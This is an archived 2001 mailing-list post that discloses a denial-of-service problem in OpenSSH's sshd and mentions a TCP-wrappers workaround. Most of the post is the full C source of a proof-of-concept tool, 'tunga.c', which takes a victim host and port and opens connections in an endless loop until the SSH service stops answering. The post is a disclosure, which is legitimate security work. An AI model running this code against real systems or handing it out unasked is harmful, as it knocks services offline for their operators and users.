Possible OpenSSH DoS Attack

From: Pedro Inacio (drbrainat_private)
Date: Mon Dec 10 2001 - 15:19:18 PST

Next message: Josha Bronson: "Re: Possible OpenSSH DoS Attack"

Previous message: Robert Freeman: "Re: Why MS namedpipe work this way"
Next in thread: Josha Bronson: "Re: Possible OpenSSH DoS Attack"
Reply: Josha Bronson: "Re: Possible OpenSSH DoS Attack"
Reply: Robert van der Meulen: "Re: Possible OpenSSH DoS Attack"
Reply: Markus Friedl: "Re: Possible OpenSSH DoS Attack"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

--[ OpenSSH DoS Attack proof of concept ]--
  by DrBrain <drbrainat_private> / http://www.phibernet.org


--[ Intro ]--

After some tests with sshd, I have noticed that it is possible to generate a
DoS attack that gives you the following message when you try to contact the
service:

----------
$ ssh userat_private
ssh_exchange_identification: Connection closed by remote host
----------

This just happens while running the code bellow, because when you stop
running it everything works fine.

It seems to be a known problem (
http://www.snailbook.com/faq/libwrap-oops.auto.html ), but until now there
is no patch available and this problem is present in all OpenSSH versions.

Although, there is an advisory to compile the SSH server with libwrap
(TCP-wrappers) support and then add some rules in /etc/hosts.{allow,deny} in
order to allow connections to sshd from any source address.

Anyway, I have made some tests and ALL the machines where vulnerable.
In my opinion it is urgent to fix this as soon as possible.

--[ Code ]--

#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <stdio.h>
#include <unistd.h>

int main (int argc, char *argv[]) {

  int sd, rc;
  struct sockaddr_in localAddr, servAddr;
  struct linger ling;
  struct hostent *h;

  if(argc < 3) {
    printf("tunga.c - OpenSSH DoS Attack\n");
    printf("by DrBrain <drbrainat_private>\n");
    printf("Phibernet Information Network < http://www.phibernet.org
>\n\n");
    printf("Usage: %s <victim> <port>\n\n",argv[0]);
    exit(1);
  }

  h = gethostbyname(argv[1]);
  if(h==NULL) {
    printf("%s: Unknown Host '%s'\n",argv[0],argv[1]);
    exit(1);
  }

  for(;;) {
    servAddr.sin_family = h->h_addrtype;
    memcpy((char *) &servAddr.sin_addr.s_addr, h->h_addr_list[0],
h->h_length);
    servAddr.sin_port = htons(atoi(argv[2]));

    sd = socket(AF_INET, SOCK_STREAM, 0);
    if(sd<0) {
      perror("Cannot Open Socket ");
      exit(1);
    }

    rc = connect(sd, (struct sockaddr *) &servAddr, sizeof(servAddr));
    if(rc<0) {
      perror("Cannot Connect ");
      exit(1);
    }
  }
  exit(0);
}


That's it!

I would like to thank megas and FatZU and all the guys in Phibernet for
helping me with some machines while testing the DoS.

-- DrBrain
"If you don't have a hammer, hack it" ;)

Next message: Josha Bronson: "Re: Possible OpenSSH DoS Attack"
Previous message: Robert Freeman: "Re: Why MS namedpipe work this way"
Next in thread: Josha Bronson: "Re: Possible OpenSSH DoS Attack"
Reply: Josha Bronson: "Re: Possible OpenSSH DoS Attack"
Reply: Robert van der Meulen: "Re: Possible OpenSSH DoS Attack"
Reply: Markus Friedl: "Re: Possible OpenSSH DoS Attack"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Mon Dec 10 2001 - 16:56:29 PST